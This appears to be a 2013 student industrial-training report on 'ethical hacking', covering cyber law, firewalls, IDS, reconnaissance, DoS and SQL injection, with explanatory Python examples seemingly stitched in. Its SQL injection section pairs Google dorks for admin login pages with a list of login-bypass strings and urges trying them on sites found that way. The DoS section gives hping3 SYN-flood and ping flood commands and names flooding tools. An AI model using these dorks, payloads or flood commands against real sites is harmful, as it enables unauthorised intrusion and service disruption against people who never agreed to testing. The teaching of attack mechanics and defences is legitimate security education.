Report On Topic: Raghav Bisht 7/16/2013
Report On Topic
Raghav Bisht
7/16/2013
SEMINAR ON INDUSTRIAL TRAINING
(June-July, 2013)
Submitted by
Raghav Bisht
Discipline of CSE/IT
June-July, 2013
DECLARATION 2013
I hereby declare that I have completed my six weeks of summer training at Bytec0de Securities
PVT. LTD from 25th May 2013 to 25th July 2013 under the guidance of Mr. Mohit Yadav. I
have worked with full dedication during these six weeks and my learning outcomes fulfil the
requirements of the training.
I would like to acknowledge my trainer Mr. Mohit Yadav, who gave me the opportunity to develop
my hacking skills under his roof, and all the other hackers who appreciated my work and
supported me till the end of my training.
A special thanks to Mr. Shorty420 & p7771 (Black hat) for sharing their work experience and
knowledge with me.
I wish to thank my family and friends. Without them, I could not have completed my training.
I would also like to thank the people who directly or indirectly helped me on this term paper.
THANKING YOU
Index
Organization overview
Training Objective
Course Outline
Introduction to hacking and security
Ethical hacking and IT security
Technology aspects for IT security & ethical hacking
Steps of hacking
Dos & Ddos attack
Wireless hacking
SQL Injection
Malware
Pen testing
Metasploit
Reason for choosing CEH
Gantt chart
Bibliography
Organization Overview
From the start they have delivered only high-quality, knowledge-based solutions, to a very
high standard, to their students, clients and partners. Bytecode believes in teamwork, and with every
new day the quest for acquiring new competencies continues. Constantly searching, experimenting,
innovating, learning, moving ahead with sincere effort and dedication, shaping the future,
and challenging their competencies to create new opportunities is a never-ending process in the
company.
They have successfully delivered training and workshop services to government departments,
corporates, institutions and leading Indian engineering colleges and schools.
They provide certification and training services for major vendors such as:
Location:
1. What is hacking?
Hacking is the process of bypassing the security mechanisms of an information system or
network. It is done step by step, partly through creative thinking and partly by using
different tools together.
Or,
Hacking is the unauthorized use of computer and network resources. Most people
think that hackers are computer criminals; they fail to recognize that
criminals and hackers are two different things, and the media is largely responsible for this.
Many hackers are in fact highly skilled people who use
their knowledge constructively to help organizations, companies,
governments, etc. secure their documents and confidential information on the internet.
So hackers, as popularly defined, are computer experts who spend an enormous
amount of time trying to breach the security of networks, web servers and e-mail.
They usually use a selection of specialist software to identify weaknesses, which are
then exploited.
The majority do it for fun and as a challenge. They are not interested in attacking
private individuals; it is the big companies and authorities they go for.
There are just two aspects of hacking that you have to worry about as a private
individual. One is that your details are held in various company databases, and when
those are cracked, information about you can be stolen.
What a skilled attacker can realistically do:
1. Enter a remote system and extract its information, then cover his tracks by clearing or
tampering with logs (forensic traces usually remain, so "without any trace" is rarely true).
2. Take over e-mail accounts and websites, and take a network down with a DDoS attack.
3. Crack passwords, at least where the password is weak, the hash has leaked or the login
form is vulnerable; there is no way to break every password.
4. Place phone calls that are hard to trace back, for example by spoofing the caller ID.
Ethical Hacking & IT Security
Ethical hacking and IT security requirements differ from person to person. A
normal computer user wants to protect their information from viruses and similar threats, while a
student may want to break into his friends' e-mail accounts, college teachers' accounts and
other valuable information according to his needs.
System administrators want to keep information safe from outside and
inside attacks, and to maintain logs and audit trails so that an attack can be investigated.
A businessman wants to protect his information from outside and
inside attacks; some businessmen are also interested in intelligence on competitors for
their business benefit. Their other interests are:
1. To protect the sensitive information in the company's database. A
company's database will usually not just contain information about the company
itself, but also data about its clients and employees. As such, should
malicious hackers be able to breach the system, they could very well get
their hands on information involving a lot of people in one go.
2. To protect the database itself. Malicious hackers may not just steal the
information in your system. To add insult to injury, they can also plant
malware in your system that could corrupt it and wipe out
everything in your database. This means the company loses a lot of very
important information.
3. To protect the business interests of the company. If the database of a company
is left unsecured and malicious hackers are able to gain access to the
information in it, the company can very well lose the respect of its clients,
partners and the business world.
A forensic analyst wants to investigate cyber cases to find out the cyber criminals, so
he needs the latest technology to resolve all issues in minimum time, and penetration
testers want to find loopholes in software or network services in order to reduce risk.
A black hat hacker wants to steal TOP SECRET information from business and
military computers for various agendas. Now everything depends on
information, whether for national security or war plans, and China, for example, is widely reported
to be interested in stealing valuable information from the USA, India, South Korea, Japan,
Thailand, Vietnam, etc.
1. IT act / laws
Each country has its own cyber law to prevent, monitor and investigate cyber
crime.
Nowadays cyber criminals understand the complexity of these laws and their effects.
Some countries also have tight security at the gateway level using their own central
monitoring systems, for example China, Russia and India.
India:
India does not have a dedicated "lawful interception law". All it has are the
"unconstitutional" provisions of the Information Technology Act 2000 (as amended by the IT
Amendment Act 2008). Through these amendments the cyber law of India has
been made an "instrumentality" of e-surveillance in India. There are no procedural
safeguards that can prevent illegal and unconstitutional e-surveillance activities
in India.
The only recourse for Indians in such circumstances is "self defence": to
prevent the illegal and unconstitutional encroachment upon their "civil liberties",
such as the right to privacy, you can do the following:
1. Use disposable e-mail addresses to avoid e-mail surveillance.
2. Use safeguards like Tor against illegal internet eavesdropping and
sniffing.
3. Use Tor for instant messaging and on mobile phones for private and secure
conversation.
4. For BlackBerry users, and anyone who wants a good combination of
privacy and security, use Pretty Good Privacy (PGP) together with any good smartphone.
This way you can have a better, e-surveillance-free mobile
setup than the controversial BlackBerry phones.
5. Use Enigmail for encrypted e-mail.
Recently, the United Nations declared the "right to access" the internet a human right.
This should have a positive impact upon many human rights in cyberspace. For
instance, the right to speech and expression, the right to privacy, the right to know, etc. cannot
be violated by the CMS project of India. The United Nations must expand human
rights protection to many more issues.
This is the real problem for the CMS project of India. We have no dedicated
privacy law, data security law or data protection law in India.
Further, the CMS project of India is also beyond "parliamentary scrutiny". The
cyber law of India, incorporated in the Information Technology Act 2000, was
drastically amended through the Information Technology Amendment Act 2008.
The IT Act 2008 incorporated various "unconstitutional provisions" into the cyber
law of India that clearly violate human rights in cyberspace. For instance, the
provisions regarding internet censorship, website blocking, encryption and
decryption, etc. have no inbuilt "procedural safeguards" as mandated by the
Constitution of India. This is the reason why the cyber law of India needs to be
repealed.
Further, we have no e-surveillance policy in India. Even phone tapping in India is
done in an "unconstitutional manner", and even by private individuals with or
without governmental approval.
If the CMS project of India is to be "legal and constitutional" it must
be subject to "parliamentary oversight". Further, the IT Act 2000 must be repealed
as soon as possible, as it is clearly not in conformity with the Constitution of India
and the protection of civil liberties in cyberspace.
The Golden Shield Project, colloquially referred to as the Great Firewall of China, is a
censorship and surveillance project operated by the Ministry of Public Security
division of the government of the People's Republic of China. The project was
initiated in 1998 and began operations in November 2003.
"Individuals are prohibited from using the internet to: harm national security;
disclose state secrets; or injure the interests of the state or society. Users are
prohibited from using the internet to create, replicate, retrieve, or transmit
information that incites resistance to the PRC Constitution, laws, or
administrative regulations; promotes the overthrow of the government or socialist
system; undermines national unification; distorts the truth, spreads rumors, or
destroys social order; or provides sexually suggestive material or encourages
gambling, violence, or murder. Users are prohibited from engaging in activities
that harm the security of computer information networks and from using networks
or changing network resources without prior approval."
The purpose of the project is to block content by preventing IP addresses from being
routed through; it consists of standard firewalls and proxy servers at the internet
gateways. Through DNS cache poisoning it is possible to make specific websites
unreachable when they are requested.
In October 2001, Greg Walton of the International Centre for Human Rights and
Democratic Development published a report in which he wrote:
1. IP blocking
IP blocking is a form of security used on mail, web or any other internet servers to
block connections from a specific IP address or range of addresses that are
considered undesirable or hostile. For example, a website forum administrator
who sees spam or unwanted posts from a user may block that user's IP address to
prevent them from using the discussion board.
Blacklist: in internet terminology, a generic name for a list of e-mail addresses or
IP addresses that originate from known spammers. Individuals and enterprises
can use blacklists to filter out unwanted e-mail, as most e-mail applications today
have filtering capabilities.
4. Packet filtering
On the internet, packet filtering is the process of passing or blocking packets at a
network interface based on source and destination addresses, ports, or protocols.
The process is often used in conjunction with packet mangling and Network Address
Translation (NAT). Packet filtering is usually part of a firewall for
protecting a local network from unwanted intrusion. In a software firewall, packet
filtering is done by a program called a packet filter. The packet filter examines the
header of each packet against a specific, ordered set of rules and on that basis decides to
prevent it from passing (called DROP) or allow it to pass (called ACCEPT). The first rule
that matches decides, so rule order matters, and a packet that no rule matches falls through
to the default policy, which should be DROP.
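The following is an added example (not code from the original report or from any firewall product) of the packet filter just described: an ordered rule list with first-match semantics, a blacklisted source range, and a default DROP policy, applied to a handful of constructed packets. The addresses, ports and rules are assumptions chosen for the illustration.

```python
"""Stateless packet filter: ordered rules, first match wins, default DROP.

Added example, not from the original report. Packets are plain dicts
constructed inline; no real sockets or kernel hooks are involved.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str                   # "ACCEPT" or "DROP"
    proto: Optional[str] = None   # "tcp", "udp", "icmp"; None matches any protocol
    src: Optional[str] = None     # CIDR such as "198.51.100.0/24"; None matches any
    dst: Optional[str] = None
    dport: Optional[int] = None   # destination port; None matches any (or no) port

    def matches(self, pkt: dict) -> bool:
        """Every field that is set must match the packet header."""
        if self.proto and pkt["proto"] != self.proto:
            return False
        if self.src and ip_address(pkt["src"]) not in ip_network(self.src):
            return False
        if self.dst and ip_address(pkt["dst"]) not in ip_network(self.dst):
            return False
        if self.dport is not None and pkt.get("dport") != self.dport:
            return False
        return True


def filter_packet(rules, pkt, default="DROP"):
    """Return the action of the first matching rule, else the default policy."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return default


# Assumed rule set: the blacklisted range comes first so it wins even for port 80,
# then the only services the server 192.0.2.10 / resolver 192.0.2.53 should expose.
RULES = [
    Rule("DROP", src="198.51.100.0/24"),
    Rule("ACCEPT", proto="tcp", dst="192.0.2.10/32", dport=80),
    Rule("ACCEPT", proto="tcp", dst="192.0.2.10/32", dport=443),
    Rule("ACCEPT", proto="udp", dst="192.0.2.53/32", dport=53),
]

# Constructed sample traffic.
SAMPLE_PACKETS = [
    {"proto": "tcp", "src": "203.0.113.5", "dst": "192.0.2.10", "dport": 80},    # web, allowed
    {"proto": "tcp", "src": "198.51.100.7", "dst": "192.0.2.10", "dport": 80},   # blacklisted source
    {"proto": "tcp", "src": "203.0.113.5", "dst": "192.0.2.10", "dport": 22},    # SSH, no rule -> default
    {"proto": "udp", "src": "203.0.113.9", "dst": "192.0.2.53", "dport": 53},    # DNS, allowed
    {"proto": "icmp", "src": "203.0.113.9", "dst": "192.0.2.10"},               # no port at all -> default
]


def run_sample():
    """Verdict for each sample packet, in order."""
    return [filter_packet(RULES, p) for p in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_PACKETS, run_sample()):
        print(f"{verdict:6} {pkt}")
```

Swapping the first two rules would let the blacklisted host reach port 80, which is the order-dependence the text warns about.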
Technology aspects for IT security & ethical hacking
Story:
"In a real war a soldier must understand all his weapons, and their timing and
effect on each target, to win the war in minimum time."
In the same way, for IT security and ethical hacking we need to understand, and be able to get
past, antivirus, firewalls, IDS and IPS when doing penetration testing or ethical hacking.
1. Antivirus
Effective antivirus software guards your computer from all forms of malware,
including traditional computer viruses, worms, Trojan horses and even
sophisticated, blended attacks. Not only does antivirus software detect and
remove malware that may already have infected your hard drive,
many products (including those that offer a free virus scan) actively prevent new infections before
they have a chance to affect your computer. Antivirus software scans and
analyzes e-mails and files for infection as they are downloaded.
Using the method of signature-based detection, antivirus software checks a file's
contents against a dictionary of known virus signatures: a pattern of bytes that
uniquely identifies a particular piece of malware. If a signature is found, the antivirus software
quarantines or removes the threat.
Antivirus software detects potential threats in a few different ways. But
what about the latest and greatest viruses? Because people create new viruses
every day, an antivirus program must constantly update its dictionary of virus
signatures. Many antivirus programs, including those that offer free
virus protection, also employ heuristic analysis, which can identify variants of
known malware: viruses that have been mutated or refined by attackers to create
different strains. The limitation is that a signature only catches what it was written for; a
sample that is repacked or modified outside what the pattern tolerates is missed until a new
signature ships.
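As an added example (not the report's code, and not how any particular antivirus vendor implements it), the scanner below shows signature matching in its simplest form: a dictionary of byte patterns, one of which carries a one-byte wildcard so that a trivially mutated variant is still caught, run over a few constructed files. The EICAR string is the industry-standard harmless test signature; the "dropper" signature and all sample files are constructed.

```python
"""Signature-based malware scan with a one-byte wildcard for simple variants.

Added example, not code from the original report or from any antivirus vendor.
The EICAR string is the standard harmless test file; the second signature, its
"variants" and all sample files are constructed for this example.
"""
import re

EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Signature dictionary: name -> hex pattern. "??" matches any single byte, the
# crudest form of the heuristic matching of variants mentioned in the text.
SIGNATURES = {
    "EICAR-Test-File": EICAR.hex(),
    "Example.Dropper.A": "4d5a90??0300000004000000ffff0000b8",   # constructed pattern
}


def compile_signature(hex_pattern):
    """Turn a hex string with '??' wildcards into a bytes regex."""
    parts = []
    for i in range(0, len(hex_pattern), 2):
        pair = hex_pattern[i:i + 2]
        parts.append(b"." if pair == "??" else re.escape(bytes.fromhex(pair)))
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_signature(p) for name, p in SIGNATURES.items()}


def scan_bytes(data):
    """Return the names of every signature found in data ([] means clean)."""
    return [name for name, rx in COMPILED.items() if rx.search(data)]


# Constructed "files": a clean document, the EICAR file, the dropper, a variant that
# differs only in the wildcarded byte, and a repacked build that differs elsewhere.
DROPPER_HEADER = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8"
SAMPLE_FILES = {
    "notes.txt": b"quarterly report, nothing suspicious here",
    "eicar.com": EICAR,
    "dropper.exe": DROPPER_HEADER + b"\x00" * 32,
    "dropper_variant.exe": DROPPER_HEADER[:3] + b"\x7f" + DROPPER_HEADER[4:] + b"\x00" * 32,
    "dropper_repacked.exe": DROPPER_HEADER[:4] + b"\x05" + DROPPER_HEADER[5:] + b"\x00" * 32,
}


def scan_all():
    """Scan every sample file; maps file name -> list of signature hits."""
    return {name: scan_bytes(data) for name, data in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:22} {'CLEAN' if not hits else ', '.join(hits)}")
```

The last file is the point: one byte changed outside the wildcard and the signature no longer fires, which is exactly why attackers repack samples and why vendors push daily updates.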
[...] and destination addresses and port numbers. This is known as address filtering.
A firewall can also filter specific types of network traffic. This is known as
protocol filtering because the decision to forward or reject traffic depends
upon the protocol used, for example HTTP, FTP or Telnet. Firewalls can also filter
traffic by packet attribute or state.
4. Anomaly based
An IDS which is anomaly based will monitor network traffic and compare it
against an established baseline. The baseline identifies what is "normal" for that
network (what sort of bandwidth is generally used, what protocols are used, what
ports and devices generally connect to each other) and the IDS alerts the administrator or
user when traffic is detected which is anomalous, or significantly different, from
the baseline. The trade-off is that the baseline must be learned from clean traffic, and the
threshold for "significantly different" decides how many false alarms the operator receives.
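The following added example (not code from the original report or any IDS product) builds such a baseline from constructed flow records, then examines one new window and raises the three kinds of alert the paragraph describes: a host sending far more than usual, a host talking to a destination and port it never used before, and a device that was never seen on the network. The flow tuples stand in for NetFlow or pcap summaries, and the three-sigma threshold is an assumption.

```python
"""Anomaly-based IDS sketch: learn a baseline from "normal" windows of traffic,
then flag a new window that deviates from it.

Added example, not from the original report or any IDS product. Flow records
(src, dst, dport, bytes) are constructed inline; the k = 3 sigma threshold and
the 5% floor on sigma are assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed baseline: four observation windows of ordinary traffic from two hosts.
BASELINE_WINDOWS = [
    [("10.0.0.5", "192.0.2.10", 443, 50000), ("10.0.0.5", "10.0.0.53", 53, 1000),
     ("10.0.0.7", "192.0.2.10", 80, 20000)],
    [("10.0.0.5", "192.0.2.10", 443, 54000), ("10.0.0.5", "10.0.0.53", 53, 1200),
     ("10.0.0.7", "192.0.2.10", 80, 18000), ("10.0.0.7", "10.0.0.53", 53, 500)],
    [("10.0.0.5", "192.0.2.10", 443, 46000), ("10.0.0.5", "10.0.0.53", 53, 800),
     ("10.0.0.7", "192.0.2.10", 80, 22000)],
    [("10.0.0.5", "192.0.2.10", 443, 52000), ("10.0.0.5", "10.0.0.53", 53, 1000),
     ("10.0.0.7", "192.0.2.10", 80, 20000), ("10.0.0.7", "10.0.0.53", 53, 500)],
]

# Constructed window under inspection: .5 pushes 900 KB to a new host on port 4444,
# .7 touches SMB on a workstation it never spoke to, and an unknown host appears.
SUSPECT_WINDOW = [
    ("10.0.0.5", "192.0.2.10", 443, 50000), ("10.0.0.5", "10.0.0.53", 53, 1000),
    ("10.0.0.5", "198.51.100.4", 4444, 900000),
    ("10.0.0.7", "192.0.2.10", 80, 21000), ("10.0.0.7", "10.0.0.9", 445, 2500),
    ("10.0.0.99", "10.0.0.53", 53, 200),
]


def build_baseline(windows):
    """Per-host (mean, stdev) of bytes per window, plus the set of (dst, dport)
    pairs each host normally talks to. A host silent in a window counts as 0."""
    hosts = {flow[0] for window in windows for flow in window}
    known_pairs = {h: set() for h in hosts}
    per_host_bytes = {h: [] for h in hosts}
    for flows in windows:
        totals = dict.fromkeys(hosts, 0)
        for src, dst, dport, nbytes in flows:
            totals[src] += nbytes
            known_pairs[src].add((dst, dport))
        for h in hosts:
            per_host_bytes[h].append(totals[h])
    stats = {h: (mean(v), pstdev(v)) for h, v in per_host_bytes.items()}
    return stats, known_pairs


def detect(stats, known_pairs, flows, k=3.0):
    """Return a set of (host, kind, detail) alerts for one window of flows."""
    alerts = set()
    totals = defaultdict(int)
    for src, dst, dport, nbytes in flows:
        totals[src] += nbytes
        if src not in known_pairs:
            alerts.add((src, "unknown-host", ""))
        elif (dst, dport) not in known_pairs[src]:
            alerts.add((src, "new-destination", f"{dst}:{dport}"))
    for host, total in totals.items():
        if host not in stats:
            continue
        mu, sigma = stats[host]
        # Floor sigma at 5% of the mean so a perfectly regular host is not a hair trigger.
        threshold = mu + k * max(sigma, 0.05 * mu)
        if total > threshold:
            alerts.add((host, "volume", f"{total} bytes > {threshold:.0f}"))
    return alerts


def run_sample():
    """Baseline from the four normal windows, then inspect the suspect window."""
    stats, known = build_baseline(BASELINE_WINDOWS)
    return detect(stats, known, SUSPECT_WINDOW)


if __name__ == "__main__":
    for alert in sorted(run_sample()):
        print(alert)
```

Note what is not alerted: host 10.0.0.7 sent 23,500 bytes against a threshold of 24,000, so its volume is within baseline and only the new SMB destination is reported; lowering k would catch it but also raise the false-alarm rate on every ordinary busy day.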
5. IPS (Intrusion prevention system)
Intrusion prevention is a pre-emptive approach to network security used to identify
potential threats and respond to them swiftly. Like an intrusion detection system
(IDS), an intrusion prevention system (IPS) monitors network traffic. However,
because an exploit may be carried out very quickly after the attacker gains access,
intrusion prevention systems also have the ability to take immediate action, based
on a set of rules established by the network administrator. For example, an IPS
might drop a packet that it determines to be malicious and block all further traffic
from that IP address or port. Legitimate traffic, meanwhile, should be forwarded to
the recipient with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion
prevention system should also perform more complex monitoring and analysis,
such as watching and responding to traffic patterns as well as individual packets.
"Detection mechanisms can include address matching, HTTP string and substring
matching, generic pattern matching, TCP connection analysis, packet anomaly
detection, traffic anomaly detection and TCP/UDP port matching."
Broadly speaking, an intrusion prevention system can be said to include any
product or practice used to keep attackers from gaining access to your network,
such as firewalls and anti-virus software. Because an IPS sits inline and blocks, a false
positive costs availability, which is why IPS rule sets are usually tuned more conservatively
than IDS rule sets.
Steps of Hacking
1. Information gathering
This is the first step of hacking and of a penetration test: first we collect all the
information we can about the target, with the help of tools and by manual methods. Without enough
information, the success rate of our attacks is low.
Manual process:
1. Get the target's URLs using Google search.
2. Use whois sites:
o www.who.is
o www.robtex.com
o www.domaintools.com
3. Get PDFs and documents using Google's advanced operators:
o site:4shared.com CISSP
o site:pastebin.com inurl:hack
o chemistry filetype:doc
o http://www.googleguide.com/advanced_operators_reference.html
Automated process:
1. We use the following tools for information gathering:
o uberharvest
o theharvester.py
o metagoofil
o web data extractors (e-mail / phone number extractors)
o Maltego
2. People search:
o pipl.com
o anywho.com
o address.com
o social networking sites (Facebook, LinkedIn, Twitter)
o job sites (dice.com, monster.com, naukri.com)
3. Phone numbers:
o truecaller.com
o kgdetective.com
o phunwa.com
4. E-mail IP tracking:
o wspy.org
o emailtrackerpro.com
o readnotify.com
o politemail.com
2. Banner grabbing
Banner grabbing is the process of learning the exact name and version of the target application, so
that one can search for known loopholes, public exploits or zero-days for that version. Some services
announce themselves as soon as you connect (SSH, FTP, SMTP); others, such as HTTP, only reveal a
version in the reply to a request, so the grabber has to send a probe first. Tools:
o Telnet
o ID Serve
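The following is an added example, not code from the original report or from the tools it lists, of what Telnet or ID Serve do under the hood: connect to a port, send a probe where the protocol requires one, read whatever comes back and pull the product and version out of it. To run offline it starts two tiny stand-in services on localhost whose banners (an OpenSSH 5.3 identification string and an Apache Server header) are constructed, not real targets.

```python
"""Banner grabbing against two local stand-in services.

Added example, not from the original report. The "services" are tiny local
servers started in threads so the script runs offline; the banners they send
are constructed and do not describe any real host.
"""
import re
import socket
import socketserver
import threading


def grab_banner(host, port, probe=None, timeout=3.0):
    """Connect, optionally send a probe (HTTP does not speak first), and return
    whatever the service sends back, decoded as text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            data = s.recv(4096)
        except socket.timeout:
            data = b""
    return data.decode("latin-1", "replace").strip()


# Patterns that pull a product/version token out of common banners.
VERSION_PATTERNS = [
    re.compile(r"SSH-\d\.\d-(\S+)"),          # SSH identification string
    re.compile(r"^Server:\s*(.+)$", re.M),    # HTTP Server header
    re.compile(r"^220[ -](.+)$", re.M),       # FTP / SMTP greeting
]


def parse_version(banner):
    """First version token found, or None if the banner gives nothing away."""
    for rx in VERSION_PATTERNS:
        m = rx.search(banner)
        if m:
            return m.group(1).strip()
    return None


class SshLikeHandler(socketserver.BaseRequestHandler):
    def handle(self):                          # talks first, like a real sshd
        self.request.sendall(b"SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7\r\n")


class HttpLikeHandler(socketserver.BaseRequestHandler):
    def handle(self):                          # waits for a request, like httpd
        self.request.recv(4096)
        self.request.sendall(b"HTTP/1.0 200 OK\r\nServer: Apache/2.2.22 (Ubuntu)\r\n"
                             b"Content-Length: 0\r\n\r\n")


def start_server(handler):
    """Bind a handler on a free localhost port and serve it from a daemon thread."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Grab and parse both banners; returns {"ssh": ..., "http": ...}."""
    ssh, web = start_server(SshLikeHandler), start_server(HttpLikeHandler)
    try:
        return {
            "ssh": parse_version(grab_banner("127.0.0.1", ssh.server_address[1])),
            "http": parse_version(grab_banner("127.0.0.1", web.server_address[1],
                                              probe=b"HEAD / HTTP/1.0\r\n\r\n")),
        }
    finally:
        for srv in (ssh, web):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The version string is only as honest as the administrator lets it be: a hardened server can blank or fake its Server header, so a banner should be treated as a lead to confirm with a scanner rather than proof of the running version.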
3. Vulnerability scanning
This step is used to find loopholes in applications using tools; afterwards we use
public and private exploits to enter the target system remotely.
Vulnerability scanners:
o Acunetix
o Netsparker
o Nessus
o GFI LanGuard
o WhatWeb [identifies the web application and its components] [BackTrack tool]
E.g.: ./whatweb bytec0de.com
o joomscan [scans Joomla websites] [/pentest/web/joomscan]
E.g.: ./joomscan.pl -u http://liclanka.com/
o Nikto:
E.g.: ./nikto.pl -host liclanka.com
o Websecurify
o Vega
o w3af
o webshag
After finding a vulnerability we look for a matching exploit; we may need to compile it with
its associated language and change the shellcode if required, for example so that it connects
back to our own host.
4. Exploitation (Obtaining access)
Program exploitation is a staple of hacking. A program is made up of a complex
set of rules following a certain execution flow that ultimately tells the computer
what to do. Exploiting a program is simply a clever way of getting the computer to
do what you want it to do, even if the currently running program was designed to
prevent that action. Since a program can really only do what it’s designed to do,
the security holes are actually flaws or oversights in the design of the program or
the environment the program is running in. It takes a creative mind to find these
holes and to write programs that compensate for them. Sometimes these holes are
the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be
applied in many different places.
1. DoS attack
A "denial-of-service" attack is characterized by an explicit attempt by attackers to
prevent legitimate users of a service from using that service. Examples include:
o attempts to "flood" a network, thereby preventing legitimate network traffic;
o attempts to disrupt connections between two machines, thereby preventing
access to a service;
o attempts to prevent a particular individual from accessing a service;
o attempts to disrupt service to a specific system or person.
It is an attempt to make a
machine or network resource unavailable to its intended users by consuming the
resources available to it, such as network bandwidth, memory of any kind, CPU or
connection-table entries.
Ping of Death
o ping -t -l 65500 google.com [max buffer size of the Windows ping = 65500]
o The original attack sent fragments that reassembled to more than the 65535-byte IP
maximum, overflowing the receiver's reassembly buffer.
o Affected systems [Solaris 2.4, Minix, Windows 3.11, 95]; modern stacks bounds-check
reassembly and are not affected.
SYN attack
o sudo hping3 -i u1 -S -p 80 192.168.1.1 [-S: set the SYN flag, -i u1: one packet every
microsecond, -p 80: destination port]
UDP/HTTP/TCP flooding
o LOIC
o HOIC
Smurf attack
o ICMP echo requests sent to a broadcast address with the victim's address spoofed as the
source, so every host on the segment replies to the victim; craft your own packets and
flood the network with:
pktbuilder
packETH 1.6 (Linux & Windows)
CDP flooding (Cisco Discovery Protocol)
o yersinia [BackTrack]
o Done against Cisco switches & routers
MAC flooding
o Flooding a switch's CAM table so that it falls back to broadcasting frames
o ARP spoofing
o NetCut [Windows]
o ettercap [BackTrack]
o Deauthentication technique (Wi-Fi)
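Why the Ping of Death worked, as an added example that is not part of the original report and does not describe any particular operating system's code: the IP Total Length field is 16 bits, so a datagram may never exceed 65535 bytes, and the old stacks listed above allocated a reassembly buffer of that size and copied each fragment to offset * 8 without checking that the write fitted. The script models that buffer in Python (where an out-of-range write merely grows the bytearray rather than corrupting memory) and shows the bounds check that fixes it; the 1480-byte fragment size assumes a 1500-byte MTU link.

```python
"""Why the Ping of Death worked: IP fragment reassembly without a bounds check.

Added example, not from the original report or any real network stack. The
unchecked version grows a bytearray past 65535 bytes where a C implementation
would overwrite adjacent memory; the checked version drops the datagram.
"""
MAX_IP_DATAGRAM = 65535    # 16-bit Total Length field: the largest legal datagram
FRAGMENT_UNIT = 8          # the 13-bit fragment offset counts 8-byte units
FRAGMENT_DATA = 1480       # assumed data per fragment on a 1500-byte MTU link


def build_fragments(payload, frag_data=FRAGMENT_DATA):
    """Split a payload into (offset_units, more_fragments, data) tuples, the
    way a sending host fragments a datagram larger than the link MTU."""
    assert frag_data % FRAGMENT_UNIT == 0
    frags = []
    for start in range(0, len(payload), frag_data):
        chunk = payload[start:start + frag_data]
        more = start + len(chunk) < len(payload)
        frags.append((start // FRAGMENT_UNIT, more, chunk))
    return frags


def reassemble_vulnerable(frags):
    """Copies each fragment to offset*8 without checking that it fits: the bug
    that the 1990s stacks listed in the text shared."""
    buf = bytearray(MAX_IP_DATAGRAM)
    for off_units, _more, data in frags:
        start = off_units * FRAGMENT_UNIT
        buf[start:start + len(data)] = data   # past the end, bytearray simply grows
    return bytes(buf)


def overflow_bytes(frags):
    """How far the unchecked reassembly writes past the 65535-byte buffer."""
    return max(0, len(reassemble_vulnerable(frags)) - MAX_IP_DATAGRAM)


def reassemble_safe(frags):
    """Rejects any fragment whose end would exceed the maximum datagram size."""
    buf = bytearray(MAX_IP_DATAGRAM)
    total = 0
    for off_units, more, data in frags:
        start = off_units * FRAGMENT_UNIT
        end = start + len(data)
        if end > MAX_IP_DATAGRAM:
            raise ValueError(f"fragment ends at byte {end}, beyond {MAX_IP_DATAGRAM}; datagram dropped")
        buf[start:end] = data
        if not more:
            total = end
    return bytes(buf[:total])


NORMAL_PING = b"\x08\x00" + b"\x00" * 62        # constructed: 64-byte ICMP echo, one fragment
OVERSIZED_PING = b"\x08\x00" + b"A" * 65998    # constructed: 66000 bytes, over the limit

if __name__ == "__main__":
    print("normal ping reassembles to", len(reassemble_safe(build_fragments(NORMAL_PING))), "bytes")
    print("oversized ping overflows by", overflow_bytes(build_fragments(OVERSIZED_PING)), "bytes")
```

The 66000-byte payload splits into 45 fragments, the last starting at byte 65120 and ending at 66000, so the unchecked copy writes 465 bytes past the buffer; the checked version refuses that last fragment. This is also why the Windows ping caps -l at 65500: with 8 bytes of ICMP header and 20 of IP header the datagram stays within 65535.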
2. DDoS attack
DDoS, short for Distributed Denial of Service, is a type of DoS attack where
multiple compromised systems, which are usually infected with a Trojan, are
used to target a single system, causing a denial of service. Victims of
a DDoS attack include both the end targeted system and all the systems maliciously
used and controlled by the attacker in the distributed attack.
According to a report on eSecurity Planet, in a DDoS attack the incoming
traffic flooding the victim originates from many different sources, potentially
hundreds of thousands or more. This effectively makes it impossible to stop the
attack simply by blocking a single IP address; plus, it is very difficult to distinguish
legitimate user traffic from attack traffic when it is spread across so many points of
origin.
Distribution of attack techniques: January 2013
1. SQL injection (login bypass)
Dorks:
o inurl:admin.asp
o inurl:login/admin.asp
o inurl:admin/login.asp
o inurl:adminlogin.asp
o inurl:adminhome.asp
o inurl:admin_login.asp
o inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
Logging in
Now you can find some sites with these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1-- you can use one of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
The password ' or 1=1-- works because the application pastes the input straight into the text of
its SQL query. The first quote closes the password string literal, "or 1=1" makes the WHERE
condition true for every row, and "--" turns whatever follows (including the application's own
closing quote) into a comment, so the query returns a row and the server treats you as logged in.
The variants with double quotes, # or no quote at all exist because they have to match the way
the particular application quotes its values; the wrong one simply becomes a harmless literal.
So if you are able to log in, the site is vulnerable and you will be able to use the
admin panel. The fix on the defending side is never to build the query from strings: with
parameterized queries (prepared statements) the input is sent separately as data and can no
longer change the shape of the statement.
